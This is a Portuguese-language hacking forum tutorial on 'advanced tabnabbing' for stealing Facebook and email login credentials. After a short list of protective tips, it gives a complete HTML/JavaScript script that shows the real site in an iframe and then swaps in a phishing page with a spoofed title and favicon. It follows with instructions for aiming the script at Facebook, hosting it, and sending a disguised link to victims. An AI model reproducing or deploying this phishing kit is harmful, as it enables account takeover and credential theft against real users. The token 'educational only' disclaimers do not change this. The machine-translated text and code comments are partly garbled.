Facebook Hack Tabnabbing Cyber-Gamers Tutorial

[V¡®u§ 849]

Hoje eu vou mostrar Como hack e-mails, sites de redes sociais e outros sites que envolvem informações de login. A técnica que eu vou ensinar a vocês hoje é avançada Tabnabbing. Eu já expliquei o que é básico tabnabbing hoje vamos ampliar a nossa base de conhecimento, eu vou explicar as coisas com exemplo prático. Então vamos la ..

Vou explicar esse tutorial usando cenário de ataque eo exemplo vivo e como se proteger de tais coisas.
Vamos considerar um cenário de ataque:

1. Um hacker dizer (ex Skynet personaliza página atual editando / adicionando alguns novos parâmetros e variáveis. (Verificar o código abaixo para mais detalhes)
2.O (Skynet) envia uma cópia desta página web a vítima, cuja conta que eu quero hack.
3. Agora quando o usuário abre o link, uma página semelhante a esta será aberta no iframe que contém a página real com a ajuda de java script.
4. O usuário será capaz de navegar no site como o original, como a frente para trás e pode navegar pelas páginas.
5. Agora se a vítima deixou a nova página aberta para determinado período de tempo, a guia ou site mudará para Phish Página ou simplesmente chamado de página fake, que vai olhar absolutamente semelhante ao original.
6. Agora quando o usuário digitar suas credenciais (nome de usuário / senha), ele está entrando na página de que Fake e ficou preso em nossa rede que eu tenho previsto para hackear ele.

Aqui final é o cenário de ataque para tabnabbing avançado.

Nota: Este tutorial é apenas para fins educacionais, não assume qualquer responsabilidade de qualquer abuso, você será o único responsável por qualquer uso indevido que você fizer. Contas de e-mail Hacking é uma atividade criminosa e é punível nos termos do crime cibernético e você pode obter até 10 anos de prisão, se pego fazendo isso.

Antes de codificação Parte permite compartilhar dicas primeiros a se proteger contra esse tipo de ataque porque a sua completamente indetectável e você nunca vai ser capaz de saber que sua conta está hackeado ou ficou comprometida. Então, primeiro aprender a proteger a nossa auto-de Tabnabbing avançada.

Segue abaixo medir para se proteger de Tabnabbing:

1. Plugin de script sempre usar anti-java está no seu navegador web que pára a execução de javascripts maliciosos. Por exemplo: NoScript para Firefox etc
2. Se você notar qualquer coisas suspeitas acontecendo, então em primeiro lugar verificar a URL na barra de endereços.
3. Se você receber qualquer link da mensagem de e-mail ou bate-papo, nunca clicar diretamente sobre ele. Prefira sempre que digitá-lo manualmente na barra de endereços para abri-lo, isso pode custar-lhe algum trabalho manual ou tempo, mas irá protegê-lo de problemas ocultos e malicioso pela URL.
4. A melhor maneira é usar qualquer barra de ferramentas web como uma boa segurança AVG web barra de ferramentas ou barra de ferramentas web Norton de segurança para se proteger de tais ataques.
5. Se você usar ideveloper ou Firebug, em seguida, verifique os cabeçalhos por si mesmo se você encontrar algo suspeito.

Que termina a nossa parte de segurança. Aqui termina o meu dever hacker ético de notificar todos os usuários sobre o ataque. Agora vamos começar a coisa real ..

Nota: Aza Raskin foi a primeira pessoa a propor a técnica de tabnabbing e ainda seguimos o mesmo conceito. Eu só vai ampliar o seu conceito para o próximo nível.

Código primeira amostra para fazer tabnabbing com a ajuda de iframes:

<!--
Title: AdvancedTabnabbing utilizando IFRAMES e Javascript
Author: Skynet-Hacker (www.cyber-gamers.org)
Website: http://cyber-gamers.org/
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Definir opções de Script--------------
var REAL_PAGE_URL = "http://www.google.com/" / / Esta é a página de "Real" que é mostrada quando o usuário vê esta página
var REAL_PAGE_TITLE = "Google" / / Isso define o título da "Página Real"
var FAKE_PAGE_URL = "http://www.cyber-gamers.org" / / Defina esta opção para a url da página falsa
var FAKE_PAGE_TITLE = "Cyber-Gamers | Next Generation Portal Hackers" / / Isso define o título da página falsa
var REAL_FAVICON = "http://www.google.com/favicon.ico" / / Isso define o favicon. Não vai mudar ou apagar o favicon "Real" no IE.
var FAKE_FAVICON = "http://www.cyber-gamers.org/favicon.ico" / / Set é o favicon falso.
var TIME_TO_SWITCH_IE = "4000"; / Hora / antes interruptor no Internet Explorer (após as alterações guia para guia falsa).
var TIME_TO_SWITCH_OTHERS = "10000" / / Esperar tanto tempo antes de mudar.
//---------------Final Opções-----------------
var TIMER = null;
var SWITCHED = "false";

//Encontrar Tipo de navegador
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Definir FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}

//Criar o nosso iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Concentre-se no iframe (apenas no caso de o usuário não clique sobre ele)
el_tabnab.focus();

//Espere para prender o guia!
if(BROWSER_TYPE=="Internet Explorer"){ //Para unblur as mudanças guia no navegador da Web Internet
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

//alterar o favicon -- Isso não parece funcionar no IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links;
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>

</body>
</html>

Agora, o que você precisa substituir nesse código para torná-lo trabalhando no Facebook:
1. REAL_PAGE_URL: www.facebook.com
2. REAL_PAGE_TITLE: Bem-vindo ao Facebook - Log-In, Registre-se ou Saiba mais
3. FAKE_PAGE_URL: Sua página falsa ou URL da página Phish
4. FAKE_PAGE_TITLE: Bem-vindo ao Facebook - Log-In, Registre-se ou Saiba mais
5. REAL_FAVICON: www.facebook.com / favicon.ico
6. FAKE_FAVICON: o URL da página Fake / favicon.ico (Nota: é melhor fazer o upload do favicon facebook, ele irá torná-lo mais indetectável)
7. BROWSER_TYPE: Encontre quais usos do navegador web do usuário normalmente e colocar esse nome aqui entre aspas.
8. TIME_TO_SWITCH_IE: Ponha valor numérico (tempo) depois que você quer guia para mudar.
9. TIME_TO_SWITCH_OTHERS: tempo após o qual deseja voltar à página original 'real' ou alguma outra página.

Agora como já expliquei anteriormente você pode usar esta técnica para Hack qualquer coisa como contas de e-mail, Facebook ou qualquer outro site de rede social. O que você precisa fazer é que basta editar os acima mencionados 9 campos e salvá-lo como anyname.htm e enviá-lo de qualquer site da web de hospedagem gratuita junto com o arquivo favicon e envie o link para o usuário em forma de e-mail ou mensagem de chat (escondido usando href palavra-chave em html ou falsificado usando alguma outra técnica).

Isso é tudo por hoje. Espero que tenham gostado algumas coisas avançadas. Se não gostou to nen ai http://cyber-gamers.org/public/style_emoticons/default/bfuf.gif

Nota: Este tutorial é apenas para fins educacionais, não assume qualquer responsabilidade de qualquer abuso, você será o único responsável por qualquer uso indevido que você fizer. Contas de e-mail Hacking é uma atividade criminosa e é punível nos termos do crime cibernético e você pode obter até 10 anos de prisão, se pego fazendo isso.

[V¡®u§ 849]

Code Atualizado!. http://cyber-gamers.org/public/style_emoticons/default/espi28.gif